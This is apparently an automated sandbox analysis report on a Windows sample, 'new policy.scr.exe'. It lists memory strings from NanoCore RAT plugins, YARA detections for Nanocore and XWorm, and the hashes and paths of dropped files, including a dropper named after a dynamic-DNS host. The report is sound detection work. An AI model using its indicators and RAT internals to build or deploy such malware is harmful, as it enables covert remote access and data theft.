engthStandardModuleAttributeSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeMyClientPlugin.dll'DisableWebcamLights
Source: new policy.scr.exe, 00000003.00000002.2870061029.0000000007950000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: new policy.scr.exe, 00000003.00000002.2867712717.0000000007790000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: new policy.scr.exe, 00000003.00000002.2867712717.0000000007790000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationFileBrowserClient.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainFileBrowserClientClientPluginCommandHandlersResourcesFileBrowserClient.My.ResourcesMySettingsMySettingsPropertyFunctionsCommandTypesMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostCurrentDirectoryInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHost_networkHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsHandleCreateDirectoryremoteDirHandleDeleteFileremoteFileisDirectoryHandleOpenFileHandleReceiveFilelocalFileHandleRenameFilenewFileNameHandleSetCurrentDirectorypathHandleDeleteHandleDownloadHandleDrivesHandleFilesHandleGetCurrentDirectoryHandleMachineNameHandleOpenHandleSetCurrentDirectoryPacketHandleUploadHandleRenameHandleCreateSendCurrentDirectorySendDrivesSendFileSendFilesSendMachineNameSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CulturevalueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsSystem.Collections.GenericList`1RemoteFilesRemoteFoldersRemoteDrivesEnumerateRemoteFilesEnumerateRemoteDrivesLogMessagemessageEnumvalue__MachineNameDrivesFilesGetCurrentDirectorySetCurrentDirectoryDownloadUploadOpenDeleteCreateDirectoryRenameSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeEnvironmentSpecialFolderGetFolderPathStringFormatSystem.IODirectoryDirectoryInfoProjectDataExceptionSetProjectErrorClearProjectErrorFileLogClientExceptionProcessStartConvertFromBase64StringWriteAllBytesMoveSendToServerConversionsToBooleanInt32NewLateBindingLateIndexGetEnumeratorEmptyGetEnumeratorget_CurrentTrimConcatMoveNextIDisposableDisposeReadAllBytesToBase64StringIsNullOrEmptyget_MachineNameToUpperget_UserNameReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedFileInfoFileSystemInfoget_FullNameContainsGetDirectoriesget_NameAddGetF
Source: new policy.scr.exe, 00000003.00000002.2870782033.0000000007980000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: Networks!.exe, 00000006.00000002.2239294193.0000000006173000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: Networks!.exe, 00000006.00000002.2239294193.000000000607A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: Networks!.exe, 00000007.00000002.2327789577.0000000005D23000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: Networks!.exe, 00000008.00000002.2274074926.00000000026F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: Networks!.exe, 00000008.00000002.2274074926.00000000026F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
Source: Networks!.exe, 00000008.00000002.2271006345.0000000000702000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: Networks!.exe, 00000008.00000002.2274766919.00000000036F9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: Networks!.exe, 00000008.00000002.2274766919.00000000036F9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
Source: Networks!.exe, 00000009.00000002.2363417540.0000000003E7B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: Networks!.exe, 00000009.00000002.2363417540.0000000003E7B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHost

Yara detected Nanocore RAT

Source: Yara match	File source: 3.2.new policy.scr.exe.59e4629.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.new policy.scr.exe.59e0000.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.Networks!.exe.37445bd.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.Networks!.exe.373b15e.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.new policy.scr.exe.42c7788.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.Networks!.exe.700000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.Networks!.exe.373ff94.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.Networks!.exe.275a4e8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.new policy.scr.exe.59e0000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.Networks!.exe.60b5958.13.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.new policy.scr.exe.42c7788.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.Networks!.exe.373ff94.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.Networks!.exe.60b5958.13.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.new policy.scr.exe.3255830.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.2239294193.0000000006173000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1877031081.000000000428C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2239294193.000000000607A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2327789577.0000000005D23000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2835253359.0000000003201000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2858583023.00000000059E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2274074926.00000000026F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2271006345.0000000000702000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2274766919.00000000036F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1877031081.000000000438C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: new policy.scr.exe PID: 7496, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: new policy.scr.exe PID: 7784, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Networks!.exe PID: 8108, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Networks!.exe PID: 7180, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Networks!.exe PID: 5868, type: MEMORYSTR

Yara detected XWorm

Source: Yara match	File source: 0.2.new policy.scr.exe.3252f80.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.airlineagancy.casacam.net 7076.exe.280000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.new policy.scr.exe.3252f80.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000000.1859765201.0000000000282000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1869683888.000000000322A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: new policy.scr.exe PID: 7496, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: airlineagancy.casacam.net 7076.exe PID: 7764, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe, type: DROPPED

Windows Analysis Report
new policy.scr.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel
Provided by

Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

ID:	1502158
Product:	CloudBasic
Start time:	09:51:06
Start date:	31.08.2024
Sample:	new policy.scr.exe
Cookbook:	default.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	01e7e40055d24780359493decf90ac21
SHA1:	b59b66a3af3a9920b7de22975997a1ec1e4d5528
SHA256:	3a5134cc11c7c47b7268e7bf6bf1556c5ff5044af54b7931cae652bfd8d83717
Filetype:	Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Networks!.exe.log	ASCII text, with CRLF line terminators	7B709BC412BEC5C3CFD861C041DAD408	532EA6BB3018AE3B51E7A5788F614A6C49252BCF	733765A1599E02C53826A4AE984426862AA714D8B67F889607153888D40BBD75
C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows	85992141E0054144793B0767444AA3E0	8DB16CF0596AA7B0794BF38397E8876F9CD7AC4D	62138A28BE6583227C33E709D31064416B7009A8A66830229AA509832706FE42
C:\Users\user\AppData\Roaming\9E146BE9-C76A-4720-BCDB-53011B87BD06\catalog.dat	data	32D0AAE13696FF7F8AF33B2D22451028	EF80C4E0DB2AE8EF288027C9D3518E6950B583A4	5347661365E7AD2C1ACC27AB0D150FFA097D9246BB3626FCA06989E976E8DD29
C:\Users\user\AppData\Roaming\9E146BE9-C76A-4720-BCDB-53011B87BD06\run.dat	Non-ISO extended-ASCII text, with no line terminators	D0FE400B78FCCFCF5716B4C1300F0B6D	3A9E1867C86317F65A617DA51341D1BCBD098B6B	DC03C95366A7E598CF817C715D1F7D1D9E67F498915A51273C066A2F03F7136A
C:\Users\user\AppData\Roaming\9E146BE9-C76A-4720-BCDB-53011B87BD06\settings.bak	data	ACD3FB4310417DC77FE06F15B0E353E6	80E7002E655EB5765FDEB21114295CB96AD9D5EB	DC3AE604991C9BB8FF8BC4502AE3D0DB8A3317512C0F432490B103B89C1A4368
C:\Users\user\AppData\Roaming\9E146BE9-C76A-4720-BCDB-53011B87BD06\settings.bin	data	4E5E92E2369688041CC82EF9650EDED2	15E44F2F3194EE232B44E9684163B6F66472C862	F8098A6290118F2944B9E7C842BD014377D45844379F863B00D54515A8A64B48
C:\Users\user\AppData\Roaming\9E146BE9-C76A-4720-BCDB-53011B87BD06\storage.dat	data	34CC720BAB9A243A96B008251C4541CA	B275C34B63ECA934EE8DD536B18D753203FC171A	A63EAF4AE6032C446FDBABB4753851121BB6C03A1CF11749962BF501FF70DEB2
C:\Users\user\AppData\Roaming\Networks!.exe	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows	01E7E40055D24780359493DECF90AC21	B59B66A3AF3A9920B7DE22975997A1EC1E4D5528	3A5134CC11C7C47B7268E7BF6BF1556C5FF5044AF54B7931CAE652BFD8D83717
C:\Users\user\AppData\Roaming\Networks!.exe:Zone.Identifier	ASCII text, with CRLF line terminators	187F488E27DB4AF347237FE461A079AD	6693BA299EC1881249D59262276A0D2CB21F8E64	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309

Windows Analysis Report new policy.scr.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel Provided by

Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report
new policy.scr.exe

Malware Threat Intel
Provided by